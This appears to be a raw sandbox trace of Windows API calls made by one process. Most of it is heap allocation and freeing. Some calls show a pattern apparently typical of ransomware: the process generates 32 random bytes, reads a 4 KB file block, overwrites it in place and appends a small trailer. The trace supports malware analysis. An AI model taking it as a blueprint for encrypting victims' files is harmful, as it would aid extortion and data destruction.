1 [0080.392] GetProcessHeap () returned 0x4f10000 [0080.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.392] GetProcessHeap () returned 0x4f10000 [0080.392] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.392] GetProcessHeap () returned 0x4f10000 [0080.392] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.392] GetProcessHeap () returned 0x4f10000 [0080.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.395] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.395] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.396] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.396] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.397] GetProcessHeap () returned 0x4f10000 [0080.397] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.398] GetProcessHeap () returned 0x4f10000 [0080.398] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.399] GetProcessHeap () returned 0x4f10000 [0080.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.399] SetFilePointerEx (in: hFile=0x858, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.399] WriteFile (in: hFile=0x858, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.399] WriteFile (in: hFile=0x858, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.400] GetProcessHeap () returned 0x4f10000 [0080.400] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.400] GetProcessHeap () returned 0x4f10000 [0080.400] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.400] GetProcessHeap () returned 0x4f10000 [0080.400] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.400] CloseHandle (hObject=0x858) returned 1 [0080.401] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 55 [0080.401] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.401] ReadFile (in: hFile=0x85c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.401] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.401] GetProcessHeap () returned 0x4f10000 [0080.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.401] GetProcessHeap () returned 0x4f10000 [0080.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.401] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.401] GetProcessHeap () returned 0x4f10000 [0080.401] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.401] ReadFile (in: hFile=0x85c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.449] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.449] WriteFile (in: hFile=0x85c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.449] GetProcessHeap () returned 0x4f10000 [0080.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.450] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.451] GetProcessHeap () returned 0x4f10000 [0080.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.452] GetProcessHeap () returned 0x4f10000 [0080.452] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.453] GetProcessHeap () returned 0x4f10000 [0080.453] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 